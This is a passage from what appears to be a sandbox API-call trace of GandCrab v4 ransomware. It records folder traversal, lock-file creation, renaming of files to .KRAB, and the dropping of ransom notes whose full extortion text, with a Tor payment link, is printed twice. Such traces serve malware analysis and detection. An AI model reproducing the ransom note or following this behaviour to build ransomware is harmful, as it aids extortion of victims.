(normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\7jr7i.avi.krab")) returned 1 [0055.876] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.876] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0055.877] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0055.877] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0055.877] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Adobe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe" [0055.877] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\" [0055.877] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.877] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.877] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.878] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.878] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\\\KRAB-DECRYPT.txt") returned 61 [0055.878] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0055.899] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0055.899] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0055.899] CloseHandle (hObject=0x43c) returned 1 [0055.900] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.900] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.900] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x63)) [0055.901] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.901] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0055.901] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0055.901] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a08d2ca4dee3d.lock") returned 67 [0055.901] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0055.913] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.914] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.914] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\") returned 44 [0055.914] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*" [0055.914] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd3a0 [0055.914] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.914] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0055.914] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0055.914] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.915] FindNextFileW (in: hFindFile=0xfbd3a0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0055.915] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0055.915] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0055.915] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Acrobat" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat" [0055.915] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\" [0055.915] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.915] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.915] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.915] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.915] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.915] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.916] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.916] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\\\KRAB-DECRYPT.txt") returned 69 [0055.916] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0055.928] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0055.928] WriteFile (in: hFile=0x430, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0055.929] CloseHandle (hObject=0x430) returned 1 [0055.930] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.930] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.930] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x3, wMilliseconds=0x7c)) [0055.930] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0055.931] GetWindowsDirectoryW (in: lpBuffer=0x35f0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0055.931] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x35f0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x35f0600, lpMaximumComponentLength=0x35f0608, lpFileSystemFlags=0x35f0604, lpFileSystemNameBuffer=0x35f0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x35f0600*=0xd2ca4def, lpMaximumComponentLength=0x35f0608*=0xff, lpFileSystemFlags=0x35f0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0055.931] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a08d2ca4dee3d.lock") returned 75 [0055.931] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x430 [0055.932] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.932] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.932] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 52 [0055.932] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0055.932] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbdce0 [0055.932] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.932] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0055.932] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0055.933] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.933] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0055.933] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0055.933] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0055.933] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a08d2ca4dee3d.lock" [0055.933] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.933] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 80 [0055.933] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\d2ca4a08d2ca4dee3d.lock") returned 75 [0055.934] lstrlenW (lpString=".lock") returned 5 [0055.934] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x35f0000 [0055.934] wsprintfW (in: param_1=0x35f0000, param_2="%s " | out: param_1=".lock ") returned 6 [0055.934] VirtualFree (lpAddress=0x35f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.934] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.934] FindNextFileW (in: hFindFile=0xfbdce0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0055.934] lstrcmpW (lpString1="DC", lpString2=".") returned 1 [0055.934] lstrcmpW (lpString1="DC", lpString2="..") returned 1 [0055.935] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="DC" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC" [0055.935] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\" [0055.935] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.935] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.935] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.935] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.935] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.935] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.935] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.936] wsprintfW (in: param_1=0x3030200, 